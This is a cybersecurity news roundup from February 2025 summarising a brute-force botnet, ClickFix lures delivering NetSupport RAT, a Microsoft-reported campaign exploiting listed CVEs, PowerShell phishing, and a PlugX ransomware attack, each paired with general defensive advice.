Massive Cyber Attack, ClickFix Deploys RAT, Hacker Group Attacks – Cybersecurity News [February 10, 2025]

Cybercriminals nowadays are getting smarter and adapting social engineering and ransomware techniques to attack their targets. This week, we’re covering a series of critical attacks that smartly leveraged the use of BotNet, affecting around 2.8 million devices. Also, we will uncover how social engineering attacks were executed to run unintended malicious PowerShell commands.

Moreover, some of the disclosed CVEs were leveraged, affecting 15+ countries worldwide. Individuals from government authorities were targeted, and RDP tools were installed stealthily to gain unauthorized access to the critical system. Last, we’ll understand how malicious threat actors financially benefit themselves by targeting SMEs and SMBs and demanding approximately $2 million in ransom figures.

Password Alert! 2.8 Million Devices Hacked in Massive Cyber Attack

A massive brute force attack has affected 2.8 million devices ranging from daily usage devices to network edge security devices (including VPNs & Firewalls). As per Shadowserver Foundation, the attack is allegedly carried out by a botnet or a network of compromised proxy devices that can be leveraged to crack weak passwords. Once the correct credentials are identified and accessed, the threat actors can use them to control a victim’s device or access their network. This malicious act was first identified and detected as it created an increasing curve in login brute-forcing attempts. Seeing the criticality of the situation the FBI has issued a warning about brute force attacks on DVRs and Web Cameras.

How can you stay safe?

1. Replace short, easily guessable passwords with long, unique, complex passphrases.
2. Use multi-factor authentication (MFA) to add a layer of security.
3. Apply all available security patches and regularly update firmware.
4. Immediately deactivate the credentials of ex-employees.

With the rise in such brute-force attacks, organizations and businesses are advised to tighten their security and adopt a multi-level security approach to mitigate threats and proactively prevent unauthorized access to their critical systems.

Attackers Use ClickFix To Deploy Malicious NetSupport RAT

Beware, a simple yet impactful social engineering technique called ClickFix is attracting the attention of malicious threat actors. By leveraging ClickFix, cybercriminals can simply inject a fake CAPTCHA page into a compromised website to trick victims into executing a malicious PowerShell command manually. Once the payload gets executed, it downloads and installs NetSupport RAT from a remote server. This malware can use PNG image files consisting of malicious payloads to evade detection without getting identified. Once the NetSupport RAT is being installed on the target, attackers can:

• Monitor screens, control devices, and issue malicious commands.
• Download and upload files
• Can capture confidential and PII data.
• Stealthy keystroke, audio, and video recording

ClickFix is not only limited to NetSupport RAT but is also used in an updated version of Lumma Stealer. To avoid detection, attackers leverage the ChaCha20 encryption technique to stealth its command-and-control (C2) configuration file. Using this technique, attackers can maliciously install malware by manipulating the victim to run unintentional malicious commands on their local systems.

Alleged Hacker Group’s Involved In Global Cyber Attacks For Years

Microsoft has revealed that a malicious faction affiliated with the infamous and alleged hacking group has been roleplaying the masterminds behind cyber-attacks in over 15 countries. The group of malicious threat actors has been targeting government and critical infrastructure worldwide by conducting a campaign called “BadPilot.”

The industries, including telecom, shipping, energy, and national government, have been on the target list. To leverage this malicious attack, the attackers use and exploit CVEs (publicly known vulnerabilities) in enterprise software like:

• JetBrains TeamCity (CVE-2023-42793)
• OpenFire (CVE-2023-32315)
• Microsoft Outlook (CVE-2023-23397)
• ConnectWise ScreenConnect (CVE-2024-1709)
• Fortinet FortiClient EMS (CVE-2023-48788)

Once accessed, an attacker can theft credentials and perform privilege escalation using stealthy and persistent techniques. According to Microsoft’s intelligence team, these activities have been associated with abuses of infrastructure, such as trojanized software passing as updates.

The latest evidence notices a new RDP backdoor, Kalambur, which aims to use compromised systems through the TOR network. Organizations and businesses must harden their security controls with faster patching and vigilance to avoid falling for social engineering tricks as attacks evolve.

Alleged Hackers Exploit PowerShell Trick To Hack Devices

PowerShell nowadays is becoming a sweet spot for initiating cybersecurity attacks and installing malware on the victim’s system. Microsoft Threat Intelligence has recently revealed that an infamous attacker group is allegedly tricking official government personnel into executing malicious PowerShell code manually to gain remote access by sending spear phishing emails with malicious PDF attachments.

Victims are instructed to visit the malicious registration link, open PowerShell with privileged permissions, and copy/paste a malicious terminal command. By executing the malicious command, the attackers can download an RDP tool registering it with a hardcoded PIN and certificate to gain complete system access remotely and here is how you can safeguard your valuable information assets:

• Implement MFA (Multi-Factor Authentication) for accounts and systems.
• Apply RBAC (Role-Based Access Controls).
• Auditing (and revoking, if needed) suspicious or unused accounts.
• Avoid executing PowerShell commands sourced from emails or unusual websites.
• Updating firmware and software regularly.
• Mitigate vulnerabilities by applying security patches.

Attackers have made social engineering their primary attack technique, tricking victims into executing malicious payloads and gaining remote access. Organizations must stay vigilant as cyberattacks become increasingly sophisticated.

Ransomware Attack Leading To Huge Data Recovery Costs

An alleged malicious threat actor’s group used state-linked espionage tools to perform a ransomware attack. Targeting an Asian-based software and services organization with ransomware, the attackers demanded a ransom of $2 million. Initially, to gain unauthorized access, attackers exploited a publicly known vulnerability (CVE-2024-0012) in Palo Alto PAN-OS. Following the event, they created a backdoor called PlugX (Korplug) using DLL sideloading techniques, combined with RC4-encrypted payloads and an NPS proxy for secret communication. This resulted in gaining sensitive and critical information and executing stealthy malicious activities using RC4 payloads.

Impacts of this ransomware attack:

• The attack made the victim’s IT infrastructure inoperable which disrupted crucial business operations.
• As the $2 million ransom demand, it led to a high data recovery cost.
• The backdoor may include the theft of sensitive and crucial PII data.

This showcased how state-sponsored attackers financially benefit them by leveraging technologies designated for espionage to carry out ransomware attacks. Organizations and businesses are suggested to prioritize and work on patch management, network segmentation, and advanced threat detection and implementing strong ransomware protection protocols.